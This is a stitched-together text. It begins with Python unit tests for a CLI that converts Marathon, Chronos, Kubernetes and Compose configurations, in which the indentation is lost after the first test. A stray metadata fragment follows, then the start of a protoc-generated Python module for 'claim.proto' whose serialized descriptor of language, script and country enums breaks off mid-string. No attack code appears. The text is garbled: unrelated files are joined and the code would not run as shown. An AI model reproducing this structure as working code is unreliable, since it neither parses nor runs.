        input_file = '{}/marathon-list.json'.format(os.path.dirname(__file__))
        result = runner.invoke(
            transform,
            [input_file, '-q', '--input-type', 'marathon', '--output-type', 'compose'])
        assert result.exit_code == 0
        service_file = '{}/marathon-list-out.yaml'.format(os.path.dirname(__file__))
        service_contents = open(service_file).read()
        self.assertEqual(
            result.output,
            service_contents
        )
def test_prompt_compose_marathon_quiet(self):
runner = CliRunner()
input_file = '{}/marathon-test.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '--input-type', 'compose', '--output-type', 'marathon'])
assert result.exit_code == 0
service_file = '{}/marathon-compose-out.json'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_compose_marathon_quiet_mini(self):
runner = CliRunner()
input_file = '{}/marathon-test.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[
input_file, '-q', '--input-type', 'compose',
'--output-type', 'marathon', '--no-verbose'])
assert result.exit_code == 0
def test_prompt_compose_marathon_single_app_quiet(self):
runner = CliRunner()
input_file = '{}/composev2.yml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[
input_file, '-q', '--input-type', 'compose',
'--output-type', 'marathon', '--no-verbose'])
assert result.exit_code == 0
result_data = json.loads(result.output)
self.assertIsInstance(result_data, dict)
def test_prompt_compose_to_chronos_quiet(self):
runner = CliRunner()
input_file = '{}/marathon-test.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[
input_file, '-q', '--input-type', 'compose',
'--output-type', 'chronos', '--no-verbose'])
assert result.exit_code == 0
result_data = json.loads(result.output)
self.assertIsInstance(result_data, list)
def test_prompt_compose_to_chronos_single_verbose_quiet(self):
runner = CliRunner()
input_file = '{}/composev2.0.yml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '-v', '-i', 'compose', '-o', 'chronos'])
assert result.exit_code == 0
result_data = json.loads(result.output)
self.assertIsInstance(result_data, dict)
def test_prompt_chronos_to_compose_list_quiet(self):
runner = CliRunner()
input_file = '{}/fixtures/chronos-list.json'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '--input-type', 'chronos', '--output-type', 'compose'])
assert result.exit_code == 0
service_file = '{}/fixtures/chronos-list-out.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_chronos_to_compose_single_quiet(self):
runner = CliRunner()
input_file = '{}/fixtures/chronos-single.json'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '--input-type', 'chronos', '--output-type', 'compose'])
assert result.exit_code == 0
service_file = '{}/fixtures/chronos-single-out.yml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_k8s_to_compose_single_quiet(self):
runner = CliRunner()
input_file = '{}/k8s_tests/alpine.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '-i', 'kubernetes', '-o', 'compose'])
assert result.exit_code == 0
service_file = '{}/k8s_tests/alpine-out.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_compose_to_k8s_single_quiet(self):
runner = CliRunner()
input_file = '{}/k8s_tests/alpine-out.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '-i', 'compose', '-o', 'kubernetes'])
assert result.exit_code == 0
service_file = '{}/k8s_tests/alpine-out-again.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_k8s_to_compose_multiple_quiet(self):
runner = CliRunner()
input_file = '{}/k8s_tests/dns.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '-i', 'kubernetes', '-o', 'compose'])
assert result.exit_code == 0
service_file = '{}/k8s_tests/dns-compose.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_compose_to_k8s_multiple_quiet(self):
self.maxDiff = None
runner = CliRunner()
input_file = '{}/k8s_tests/dns-compose.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '-i', 'compose', '-o', 'kubernetes'])
assert result.exit_code == 0
service_file = '{}/k8s_tests/dns-k8s-out.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
] | 369 | 2015-12-05T21:18:07.000Z | 2019-06-10T12:40:50.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: claim.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='claim.proto',
package='pb',
syntax='proto3',
serialized_pb=_b('\n\x0b\x63laim.proto\x12\x02pb\"\xab\x02\n\x05\x43laim\x12\x1c\n\x06stream\x18\x01 \x01(\x0b\x32\n.pb.StreamH\x00\x12\x1e\n\x07\x63hannel\x18\x02 \x01(\x0b\x32\x0b.pb.ChannelH\x00\x12#\n\ncollection\x18\x03 \x01(\x0b\x32\r.pb.ClaimListH\x00\x12$\n\x06repost\x18\x04 \x01(\x0b\x32\x12.pb.ClaimReferenceH\x00\x12\r\n\x05title\x18\x08 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\t \x01(\t\x12\x1d\n\tthumbnail\x18\n \x01(\x0b\x32\n.pb.Source\x12\x0c\n\x04tags\x18\x0b \x03(\t\x12\x1f\n\tlanguages\x18\x0c \x03(\x0b\x32\x0c.pb.Language\x12\x1f\n\tlocations\x18\r \x03(\x0b\x32\x0c.pb.LocationB\x06\n\x04type\"\x84\x02\n\x06Stream\x12\x1a\n\x06source\x18\x01 \x01(\x0b\x32\n.pb.Source\x12\x0e\n\x06\x61uthor\x18\x02 \x01(\t\x12\x0f\n\x07license\x18\x03 \x01(\t\x12\x13\n\x0blicense_url\x18\x04 \x01(\t\x12\x14\n\x0crelease_time\x18\x05 \x01(\x03\x12\x14\n\x03\x66\x65\x65\x18\x06 \x01(\x0b\x32\x07.pb.Fee\x12\x1a\n\x05image\x18\n \x01(\x0b\x32\t.pb.ImageH\x00\x12\x1a\n\x05video\x18\x0b \x01(\x0b\x32\t.pb.VideoH\x00\x12\x1a\n\x05\x61udio\x18\x0c \x01(\x0b\x32\t.pb.AudioH\x00\x12 \n\x08software\x18\r \x01(\x0b\x32\x0c.pb.SoftwareH\x00\x42\x06\n\x04type\"}\n\x07\x43hannel\x12\x12\n\npublic_key\x18\x01 \x01(\x0c\x12\r\n\x05\x65mail\x18\x02 \x01(\t\x12\x13\n\x0bwebsite_url\x18\x03 \x01(\t\x12\x19\n\x05\x63over\x18\x04 \x01(\x0b\x32\n.pb.Source\x12\x1f\n\x08\x66\x65\x61tured\x18\x05 \x01(\x0b\x32\r.pb.ClaimList\"$\n\x0e\x43laimReference\x12\x12\n\nclaim_hash\x18\x01 \x01(\x0c\"\x90\x01\n\tClaimList\x12)\n\tlist_type\x18\x01 \x01(\x0e\x32\x16.pb.ClaimList.ListType\x12,\n\x10\x63laim_references\x18\x02 \x03(\x0b\x32\x12.pb.ClaimReference\"*\n\x08ListType\x12\x0e\n\nCOLLECTION\x10\x00\x12\x0e\n\nDERIVATION\x10\x02\"y\n\x06Source\x12\x0c\n\x04hash\x18\x01 \x01(\x0c\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0c\n\x04size\x18\x03 \x01(\x04\x12\x12\n\nmedia_type\x18\x04 \x01(\t\x12\x0b\n\x03url\x18\x05 \x01(\t\x12\x0f\n\x07sd_hash\x18\x06 \x01(\x0c\x12\x13\n\x0b\x62t_infohash\x18\x07 
\x01(\x0c\"\x87\x01\n\x03\x46\x65\x65\x12\"\n\x08\x63urrency\x18\x01 \x01(\x0e\x32\x10.pb.Fee.Currency\x12\x0f\n\x07\x61\x64\x64ress\x18\x02 \x01(\x0c\x12\x0e\n\x06\x61mount\x18\x03 \x01(\x04\";\n\x08\x43urrency\x12\x14\n\x10UNKNOWN_CURRENCY\x10\x00\x12\x07\n\x03LBC\x10\x01\x12\x07\n\x03\x42TC\x10\x02\x12\x07\n\x03USD\x10\x03\"&\n\x05Image\x12\r\n\x05width\x18\x01 \x01(\r\x12\x0e\n\x06height\x18\x02 \x01(\r\"R\n\x05Video\x12\r\n\x05width\x18\x01 \x01(\r\x12\x0e\n\x06height\x18\x02 \x01(\r\x12\x10\n\x08\x64uration\x18\x03 \x01(\r\x12\x18\n\x05\x61udio\x18\x0f \x01(\x0b\x32\t.pb.Audio\"\x19\n\x05\x41udio\x12\x10\n\x08\x64uration\x18\x01 \x01(\r\"l\n\x08Software\x12\n\n\x02os\x18\x01 \x01(\t\"T\n\x02OS\x12\x0e\n\nUNKNOWN_OS\x10\x00\x12\x07\n\x03\x41NY\x10\x01\x12\t\n\x05LINUX\x10\x02\x12\x0b\n\x07WINDOWS\x10\x03\x12\x07\n\x03MAC\x10\x04\x12\x0b\n\x07\x41NDROID\x10\x05\x12\x07\n\x03IOS\x10\x06\"\xc7\x1d\n\x08Language\x12\'\n\x08language\x18\x01 \x01(\x0e\x32\x15.pb.Language.Language\x12#\n\x06script\x18\x02 \x01(\x0e\x32\x13.pb.Language.Script\x12$\n\x06region\x18\x03 
\x01(\x0e\x32\x14.pb.Location.Country\"\x99\x0c\n\x08Language\x12\x14\n\x10UNKNOWN_LANGUAGE\x10\x00\x12\x06\n\x02\x65n\x10\x01\x12\x06\n\x02\x61\x61\x10\x02\x12\x06\n\x02\x61\x62\x10\x03\x12\x06\n\x02\x61\x65\x10\x04\x12\x06\n\x02\x61\x66\x10\x05\x12\x06\n\x02\x61k\x10\x06\x12\x06\n\x02\x61m\x10\x07\x12\x06\n\x02\x61n\x10\x08\x12\x06\n\x02\x61r\x10\t\x12\x06\n\x02\x61s\x10\n\x12\x06\n\x02\x61v\x10\x0b\x12\x06\n\x02\x61y\x10\x0c\x12\x06\n\x02\x61z\x10\r\x12\x06\n\x02\x62\x61\x10\x0e\x12\x06\n\x02\x62\x65\x10\x0f\x12\x06\n\x02\x62g\x10\x10\x12\x06\n\x02\x62h\x10\x11\x12\x06\n\x02\x62i\x10\x12\x12\x06\n\x02\x62m\x10\x13\x12\x06\n\x02\x62n\x10\x14\x12\x06\n\x02\x62o\x10\x15\x12\x06\n\x02\x62r\x10\x16\x12\x06\n\x02\x62s\x10\x17\x12\x06\n\x02\x63\x61\x10\x18\x12\x06\n\x02\x63\x65\x10\x19\x12\x06\n\x02\x63h\x10\x1a\x12\x06\n\x02\x63o\x10\x1b\x12\x06\n\x02\x63r\x10\x1c\x12\x06\n\x02\x63s\x10\x1d\x12\x06\n\x02\x63u\x10\x1e\x12\x06\n\x02\x63v\x10\x1f\x12\x06\n\x02\x63y\x10 \x12\x06\n\x02\x64\x61\x10!\x12\x06\n\x02\x64\x65\x10\"\x12\x06\n\x02\x64v\x10#\x12\x06\n\x02\x64z\x10$\x12\x06\n\x02\x65\x65\x10%\x12\x06\n\x02\x65l\x10&\x12\x06\n\x02\x65o\x10\'\x12\x06\n\x02\x65s\x10(\x12\x06\n\x02\x65t\x10)\x12\x06\n\x02\x65u\x10*\x12\x06\n\x02\x66\x61\x10+\x12\x06\n\x02\x66\x66\x10,\x12\x06\n\x02\x66i\x10-\x12\x06\n\x02\x66j\x10.\x12\x06\n\x02\x66o\x10/\x12\x06\n\x02\x66r\x10\x30\x12\x06\n\x02\x66y\x10\x31\x12\x06\n\x02ga\x10\x32\x12\x06\n\x02gd\x10\x33\x12\x06\n\x02gl\x10\x34\x12\x06\n\x02gn\x10\x35\x12\x06\n\x02gu\x10\x36\x12\x06\n\x02gv\x10\x37\x12\x06\n\x02ha\x10\x38\x12\x06\n\x02he\x10\x39\x12\x06\n\x02hi\x10:\x12\x06\n\x02ho\x10;\x12\x06\n\x02hr\x10<\x12\x06\n\x02ht\x10=\x12\x06\n\x02hu\x10>\x12\x06\n\x02hy\x10?\x12\x06\n\x02hz\x10@\x12\x06\n\x02ia\x10\x41\x12\x06\n\x02id\x10\x42\x12\x06\n\x02ie\x10\x43\x12\x06\n\x02ig\x10\x44\x12\x06\n\x02ii\x10\x45\x12\x06\n\x02ik\x10\x46\x12\x06\n\x02io\x10G\x12\x06\n\x02is\x10H\x12\x06\n\x02it\x10I\x12\x06\n\x02iu\x10J\x12\x06\n\x02ja\x10K\x1
2\x06\n\x02jv\x10L\x12\x06\n\x02ka\x10M\x12\x06\n\x02kg\x10N\x12\x06\n\x02ki\x10O\x12\x06\n\x02kj\x10P\x12\x06\n\x02kk\x10Q\x12\x06\n\x02kl\x10R\x12\x06\n\x02km\x10S\x12\x06\n\x02kn\x10T\x12\x06\n\x02ko\x10U\x12\x06\n\x02kr\x10V\x12\x06\n\x02ks\x10W\x12\x06\n\x02ku\x10X\x12\x06\n\x02kv\x10Y\x12\x06\n\x02kw\x10Z\x12\x06\n\x02ky\x10[\x12\x06\n\x02la\x10\\\x12\x06\n\x02lb\x10]\x12\x06\n\x02lg\x10^\x12\x06\n\x02li\x10_\x12\x06\n\x02ln\x10`\x12\x06\n\x02lo\x10\x61\x12\x06\n\x02lt\x10\x62\x12\x06\n\x02lu\x10\x63\x12\x06\n\x02lv\x10\x64\x12\x06\n\x02mg\x10\x65\x12\x06\n\x02mh\x10\x66\x12\x06\n\x02mi\x10g\x12\x06\n\x02mk\x10h\x12\x06\n\x02ml\x10i\x12\x06\n\x02mn\x10j\x12\x06\n\x02mr\x10k\x12\x06\n\x02ms\x10l\x12\x06\n\x02mt\x10m\x12\x06\n\x02my\x10n\x12\x06\n\x02na\x10o\x12\x06\n\x02nb\x10p\x12\x06\n\x02nd\x10q\x12\x06\n\x02ne\x10r\x12\x06\n\x02ng\x10s\x12\x06\n\x02nl\x10t\x12\x06\n\x02nn\x10u\x12\x06\n\x02no\x10v\x12\x06\n\x02nr\x10w\x12\x06\n\x02nv\x10x\x12\x06\n\x02ny\x10y\x12\x06\n\x02oc\x10z\x12\x06\n\x02oj\x10{\x12\x06\n\x02om\x10|\x12\x06\n\x02or\x10}\x12\x06\n\x02os\x10~\x12\x06\n\x02pa\x10\x7f\x12\x07\n\x02pi\x10\x80\x01\x12\x07\n\x02pl\x10\x81\x01\x12\x07\n\x02ps\x10\x82\x01\x12\x07\n\x02pt\x10\x83\x01\x12\x07\n\x02qu\x10\x84\x01\x12\x07\n\x02rm\x10\x85\x01\x12\x07\n\x02rn\x10\x86\x01\x12\x07\n\x02ro\x10\x87\x01\x12\x07\n\x02ru\x10\x88\x01\x12\x07\n\x02rw\x10\x89\x01\x12\x07\n\x02sa\x10\x8a\x01\x12\x07\n\x02sc\x10\x8b\x01\x12\x07\n\x02sd\x10\x8c\x01\x12\x07\n\x02se\x10\x8d\x01\x12\x07\n\x02sg\x10\x8e\x01\x12\x07\n\x02si\x10\x8f\x01\x12\x07\n\x02sk\x10\x90\x01\x12\x07\n\x02sl\x10\x91\x01\x12\x07\n\x02sm\x10\x92\x01\x12\x07\n\x02sn\x10\x93\x01\x12\x07\n\x02so\x10\x94\x01\x12\x07\n\x02sq\x10\x95\x01\x12\x07\n\x02sr\x10\x96\x01\x12\x07\n\x02ss\x10\x97\x01\x12\x07\n\x02st\x10\x98\x01\x12\x07\n\x02su\x10\x99\x01\x12\x07\n\x02sv\x10\x9a\x01\x12\x07\n\x02sw\x10\x9b\x01\x12\x07\n\x02ta\x10\x9c\x01\x12\x07\n\x02te\x10\x9d\x01\x12\x07\n\x02tg\x10\x9e\x01\x12\x07\n\x02th\x10\
x9f\x01\x12\x07\n\x02ti\x10\xa0\x01\x12\x07\n\x02tk\x10\xa1\x01\x12\x07\n\x02tl\x10\xa2\x01\x12\x07\n\x02tn\x10\xa3\x01\x12\x07\n\x02to\x10\xa4\x01\x12\x07\n\x02tr\x10\xa5\x01\x12\x07\n\x02ts\x10\xa6\x01\x12\x07\n\x02tt\x10\xa7\x01\x12\x07\n\x02tw\x10\xa8\x01\x12\x07\n\x02ty\x10\xa9\x01\x12\x07\n\x02ug\x10\xaa\x01\x12\x07\n\x02uk\x10\xab\x01\x12\x07\n\x02ur\x10\xac\x01\x12\x07\n\x02uz\x10\xad\x01\x12\x07\n\x02ve\x10\xae\x01\x12\x07\n\x02vi\x10\xaf\x01\x12\x07\n\x02vo\x10\xb0\x01\x12\x07\n\x02wa\x10\xb1\x01\x12\x07\n\x02wo\x10\xb2\x01\x12\x07\n\x02xh\x10\xb3\x01\x12\x07\n\x02yi\x10\xb4\x01\x12\x07\n\x02yo\x10\xb5\x01\x12\x07\n\x02za\x10\xb6\x01\x12\x07\n\x02zh\x10\xb7\x01\x12\x07\n\x02zu\x10\xb8\x01\"\xaa\x10\n\x06Script\x12\x12\n\x0eUNKNOWN_SCRIPT\x10\x00\x12\x08\n\x04\x41\x64lm\x10\x01\x12\x08\n\x04\x41\x66\x61k\x10\x02\x12\x08\n\x04\x41ghb\x10\x03\x12\x08\n\x04\x41hom\x10\x04\x12\x08\n\x04\x41rab\x10\x05\x12\x08\n\x04\x41ran\x10\x06\x12\x08\n\x04\x41rmi\x10\x07\x12\x08\n\x04\x41rmn\x10\x08\x12\x08\n\x04\x41vst\x10\t\x12\x08\n\x04\x42\x61li\x10\n\x12\x08\n\x04\x42\x61mu\x10\x0b\x12\x08\n\x04\x42\x61ss\x10\x0c\x12\x08\n\x04\x42\x61tk\x10\r\x12\x08\n\x04\x42\x65ng\x10\x0e\x12\x08\n\x04\x42hks\x10\x0f\x12\x08\n\x04\x42lis\x10\x10\x12\x08\n\x04\x42opo\x10\x11\x12\x08\n\x04\x42rah\x10\x12\x12\x08\n\x04\x42rai\x10\x13\x12\x08\n\x04\x42ugi\x10\x14\x12\x08\n\x04\x42uhd\x10\x15\x12\x08\n\x04\x43\x61km\x10\x16\x12\x08\n\x04\x43\x61ns\x10\x17\x12\x08\n\x04\x43\x61ri\x10\x18\x12\x08\n\x04\x43ham\x10\x19\x12\x08\n\x04\x43her\x10\x1a\x12\x08\n\x04\x43irt\x10\x1b\x12\x08\n\x04\x43opt\x10\x1c\x12\x08\n\x04\x43pmn\x10\x1d\x12\x08\n\x04\x43prt\x10\x1e\x12\x08\n\x04\x43yrl\x10\x1f\x12\x08\n\x04\x43yrs\x10 
\x12\x08\n\x04\x44\x65va\x10!\x12\x08\n\x04\x44ogr\x10\"\x12\x08\n\x04\x44srt\x10#\x12\x08\n\x04\x44upl\x10$\x12\x08\n\x04\x45gyd\x10%\x12\x08\n\x04\x45gyh\x10&\x12\x08\n\x04\x45gyp\x10\'\x12\x08\n\x04\x45lba\x10(\x12\x08\n\x04\x45lym\x10)\x12\x08\n\x04\x45thi\x10*\x12\x08\n\x04Geok\x10+\x12\x08\n\x04Geor\x10,\x12\x08\n\x04Glag\x10-\x12\x08\n\x04Gong\x10.\x12\x08\n\x04Gonm\x10/\x12\x08\n\x04Goth\x10\x30\x12\x08\n\x04Gran\x10\x31\x12\x08\n\x04Grek\x10\x32\x12\x08\n\x04Gujr\x10\x33\x12\x08\n\x04Guru\x10\x34\x12\x08\n\x04Hanb\x10\x35\x12\x08\n\x04Hang\x10\x36\x12\x08\n\x04Hani\x10\x37\x12\x08\n\x04Hano\x10\x38\x12\x08\n\x04Hans\x10\x39\x12\x08\n\x04Hant\x10:\x12\x08\n\x04Hatr\x10;\x12\x08\n\x04Hebr\x10<\x12\x08\n\x04Hira\x10=\x12\x08\n\x04Hluw\x10>\x12\x08\n\x04Hmng\x10?\x12\x08\n\x04Hmnp\x10@\x12\x08\n\x04Hrkt\x10\x41\x12\x08\n\x04Hung\x10\x42\x12\x08\n\x04Inds\x10\x43\x12\x08\n\x04Ital\x10\x44\x12\x08\n\x04Jamo\x10\x45\x12\x08\n\x04Java\x10\x46\x12\x08\n\x04Jpan\x10G\x12\x08\n\x04Jurc\x10H\x12\x08\n\x04Kali\x10I\x12\x08\n\x04Kana\x10J\x12\x08\n\x04Khar\x10K\x12\x08\n\x04Khmr\x10L\x12\x08\n\x04Khoj\x10M\x12\x08\n\x04Kitl\x10N\x12\x08\n\x04Kits\x10O\x12\x08\n\x04Knda\x10P\x12\x08\n\x04Kore\x10Q\x12\x08\n\x04Kpel\x10R\x12\x08\n\x04Kthi\x10S\x12\x08\n\x04Lana\x10T\x12\x08\n\x04Laoo\x10U\x12\x08\n\x04Latf\x10V\x12\x08\n\x04Latg\x10W\x12\x08\n\x04Latn\x10X\x12\x08\n\x04Leke\x10Y\x12\x08\n\x04Lepc\x10Z\x12\x08\n\x04Limb\x10[\x12\x08\n\x04Lina\x10\\\x12\x08\n\x04Linb\x10]\x12\x08\n\x04Lisu\x10^\x12\x08\n\x04Loma\x10_\x12\x08\n\x04Lyci\x10`\x12\x08\n\x04Lydi\x10\x61\x12\x08\n\x04Mahj\x10\x62\x12\x08\n\x04Maka\x10\x63\x12\x08\n\x04Mand\x10\x64\x12\x08\n\x04Mani\x10\x65\x12\x08\n\x04Marc\x10\x66\x12\x08\n\x04Maya\x10g\x12\x08\n\x04Medf\x10h\x12\x08\n\x04Mend\x10i\x12\x08\n\x04Merc\x10j\x12\x08\n\x04Mero\x10k\x12\x08\n\x04Mlym\x10l\x12\x08\n\x04Modi\x10m\x12\x08\n\x04Mong\x10n\x12\x08\n\x04Moon\x10o\x12\x08\n\x04Mroo\x10p\x12\x08\n\x04Mtei\x10q\x12\x08\n\x04Mult\x10r\x12\x08\n\x
04Mymr\x10s\x12\x08\n\x04Nand\x10t\x12\x08\n\x04Narb\x10u\x12\x08\n\x04Nbat\x10v\x12\x08\n\x04Newa\x10w\x12\x08\n\x04Nkdb\x10x\x12\x08\n\x04Nkgb\x10y\x12\x08\n\x04Nkoo\x10z\x12\x08\n\x04Nshu\x10{\x12\x08\n\x04Ogam\x10|\x12\x08\n\x04Olck\x10}\x12\x08\n\x04Orkh\x10~\x12\x08\n\x04Orya\x10\x7f\x12\t\n\x04Osge\x10\x80\x01\x12\t\n\x04Osma\x10\x81\x01\x12\t\n\x04Palm\x10\x82\x01\x12\t\n\x04Pauc\x10\x83\x01\x12\t\n\x04Perm\x10\x84\x01\x12\t\n\x04Phag\x10\x85\x01\x12\t\n\x04Phli\x10\x86\x01\x12\t\n\x04Phlp\x10\x87\x01\x12\t\n\x04Phlv\x10\x88\x01\x12\t\n\x04Phnx\x10\x89\x01\x12\t\n\x04Plrd\x10\x8a\x01\x12\t\n\x04Piqd\x10\x8b\x01\x12\t\n\x04Prti\x10\x8c\x01\x12\t\n\x04Qaaa\x10\x8d\x01\x12\t\n\x04Qabx\x10\x8e\x01\x12\t\n\x04Rjng\x10\x8f\x01\x12\t\n\x04Rohg\x10\x90\x01\x12\t\n\x04Roro\x10\x91\x01\x12\t\n\x04Runr\x10\x92\x01\x12\t\n\x04Samr\x10\x93\x01\x12\t\n\x04Sara\x10\x94\x01\x12\t\n\x04Sarb\x10\x95\x01\x12\t\n\x04Saur\x10\x96\x01\x12\t\n\x04Sgnw\x10\x97\x01\x12\t\n\x04Shaw\x10\x98\x01\x12\t\n\x04Shrd\x10\x99\x01\x12\t\n\x04Shui\x10\x9a\x01\x12\t\n\x04Sidd\x10\x9b\x01\x12\t\n\x04Sind\x10\x9c\x01\x12\t\n\x04Sinh\x10\x9d\x01\x12\t\n\x04Sogd\x10\x9e\x01\x12\t\n\x04Sogo\x10\x9f\x01\x12\t\n\x04Sora\x10\xa0\x01\x12\t\n\x04Soyo\x10\xa1\x01\x12\t\n\x04Sund\x10\xa2\x01\x12\t\n\x04Sylo\x10\xa3\x01\x12\t\n\x04Syrc\x10\xa4\x01\x12\t\n\x04Syre\x10\xa5\x01\x12\t\n\x04Syrj\x10\xa6\x01\x12\t\n\x04Syrn\x10\xa7\x01\x12\t\n\x04Tagb\x10\xa8\x01\x12\t\n\x04Takr\x10\xa9\x01\x12\t\n\x04Tale\x10\xaa\x01\x12\t\n\x04Talu\x10\xab\x01\x12\t\n\x04Taml\x10\xac\x01\x12\t\n\x04Tang\x10\xad\x01\x12\t\n\x04Tavt\x10\xae\x01\x12\t\n\x04Telu\x10\xaf\x01\x12\t\n\x04Teng\x10\xb0\x01\x12\t\n\x04Tfng\x10\xb1\x01\x12\t\n\x04Tglg\x10\xb2\x01\x12\t\n\x04Thaa\x10\xb3\x01\x12\t\n\x04Thai\x10\xb4\x01\x12\t\n\x04Tibt\x10\xb5\x01\x12\t\n\x04Tirh\x10\xb6\x01\x12\t\n\x04Ugar\x10\xb7\x01\x12\t\n\x04Vaii\x10\xb8\x01\x12\t\n\x04Visp\x10\xb9\x01\x12\t\n\x04Wara\x10\xba\x01\x12\t\n\x04Wcho\x10\xbb\x01\x12\t\n\x04Wole\x10\xbc\x01\x
12\t\n\x04Xpeo\x10\xbd\x01\x12\t\n\x04Xsux\x10\xbe\x01\x12\t\n\x04Yiii\x10\xbf\x01\x12\t\n\x04Zanb\x10\xc0\x01\x12\t\n\x04Zinh\x10\xc1\x01\x12\t\n\x04Zmth\x10\xc2\x01\x12\t\n\x04Zsye\x10\xc3\x01\x12\t\n\x04Zsym\x10\xc4\x01\x12\t\n\x04Zxxx\x10\xc5\x01\x12\t\n\x04Zyyy\x10\xc6\x01\x12\t\n\x04Zzzz\x10\xc7\x01\"\xec)\n\x08Location\x12%\n\x07\x63ountry\x18\x01 \x01(\x0e\x32\x14.pb.Location.Country\x12\r\n\x05state\x18\x02 \x01(\t\x12\x0c\n\x04\x63ity\x18\x03 \x01(\t\x12\x0c\n\x04\x63ode\x18\x04 \x01(\t\x12\x10\n\x08latitude\x18\x05 \x01(\x11\x12\x11\n\tlongitude\x18\x06 \x01(\x11\"\xe8(\n\x07\x43ountry\x12\x13\n\x0fUNKNOWN_COUNTRY\x10\x00\x12\x06\n\x02\x41\x46\x10\x01\x12\x06\n\x02\x41X\x10\x02\x12\x06\n\x02\x41L\x10\x03\x12\x06\n\x02\x44Z\x10\x04\x12\x06\n\x02\x41S\x10\x05\x12\x06\n\x02\x41\x44\x10\x06\x12\x06\n\x02\x41O\x10\x07\x12\x06\n\x02\x41I\x10\x08\x12\x06\n\x02\x41Q\x10\t\x12\x06\n\x02\x41G\x10\n\x12\x06\n\x02\x41R\x10\x0b\x12\x06\n\x02\x41M\x10\x0c\x12\x06\n\x02\x41W\x10\r\x12\x06\n\x02\x41U\x10\x0e\x12\x06\n\x02\x41T\x10\x0f\x12\x06\n\x02\x41Z\x10\x10\x12\x06\n\x02\x42S\x10\x11\x12\x06\n\x02\x42H\x10\x12\x12\x06\n\x02\x42\x44\x10\x13\x12\x06\n\x02\x42\x42\x10\x14\x12\x06\n\x02\x42Y\x10\x15\x12\x06\n\x02\x42\x45\x10\x16\x12\x06\n\x02\x42Z\x10\x17\x12\x06\n\x02\x42J\x10\x18\x12\x06\n\x02\x42M\x10\x19\x12\x06\n\x02\x42T\x10\x1a\x12\x06\n\x02\x42O\x10\x1b\x12\x06\n\x02\x42Q\x10\x1c\x12\x06\n\x02\x42\x41\x10\x1d\x12\x06\n\x02\x42W\x10\x1e\x12\x06\n\x02\x42V\x10\x1f\x12\x06\n\x02\x42R\x10 
\x12\x06\n\x02IO\x10!\x12\x06\n\x02\x42N\x10\"\x12\x06\n\x02\x42G\x10#\x12\x06\n\x02\x42\x46\x10$\x12\x06\n\x02\x42I\x10%\x12\x06\n\x02KH\x10&\x12\x06\n\x02\x43M\x10\'\x12\x06\n\x02\x43\x41\x10(\x12\x06\n\x02\x43V\x10)\x12\x06\n\x02KY\x10*\x12\x06\n\x02\x43\x46\x10+\x12\x06\n\x02TD\x10,\x12\x06\n\x02\x43L\x10-\x12\x06\n\x02\x43N\x10.\x12\x06\n\x02\x43X\x10/\x12\x06\n\x02\x43\x43\x10\x30\x12\x06\n\x02\x43O\x10\x31\x12\x06\n\x02KM\x10\x32\x12\x06\n\x02\x43G\x10\x33\x12\x06\n\x02\x43\x44\x10\x34\x12\x06\n\x02\x43K\x10\x35\x12\x06\n\x02\x43R\x10\x36\x12\x06\n\x02\x43I\x10\x37\x12\x06\n\x02HR\x10\x38\x12\x06\n\x02\x43U\x10\x39\x12\x06\n\x02\x43W\x10:\x12\x06\n\x02\x43Y\x10;\x12\x06\n\x02\x43Z\x10<\x12\x06\n\x02\x44K\x10=\x12\x06\n\x02\x44J\x10>\x12\x06\n\x02\x44M\x10?\x12\x06\n\x02\x44O\x10@\x12\x06\n\x02\x45\x43\x10\x41\x12\x06\n\x02\x45G\x10\x42\x12\x06\n\x02SV\x10\x43\x12\x06\n\x02GQ\x10\x44\x12\x06\n\x02\x45R\x10\x45\x12\x06\n\x02\x45\x45\x10\x46\x12\x06\n\x02\x45T\x10G\x12\x06\n\x02\x46K\x10H\x12\x06\n\x02\x46O\x10I\x12\x06\n\x02\x46J\x10J\x12\x06\n\x02\x46I\x10K\x12\x06\n\x02\x46R\x10L\x12\x06\n\x02GF\x10M\x12\x06\n\x02PF\x10N\x12\x06\n\x02TF\x10O\x12\x06\n\x02GA\x10P\x12\x06\n\x02GM\x10Q\x12\x06\n\x02GE\x10R\x12\x06\n\x02\x44\x45\x10S\x12\x06\n\x02GH\x10T\x12\x06\n\x02GI\x10U\x12\x06\n\x02GR\x10V\x12\x06\n\x02GL\x10W\x12\x06\n\x02GD\x10X\x12\x06\n\x02GP\x10Y\x12\x06\n\x02GU\x10Z\x12\x06\n\x02GT\x10[\x12\x06\n\x02GG\x10\\\x12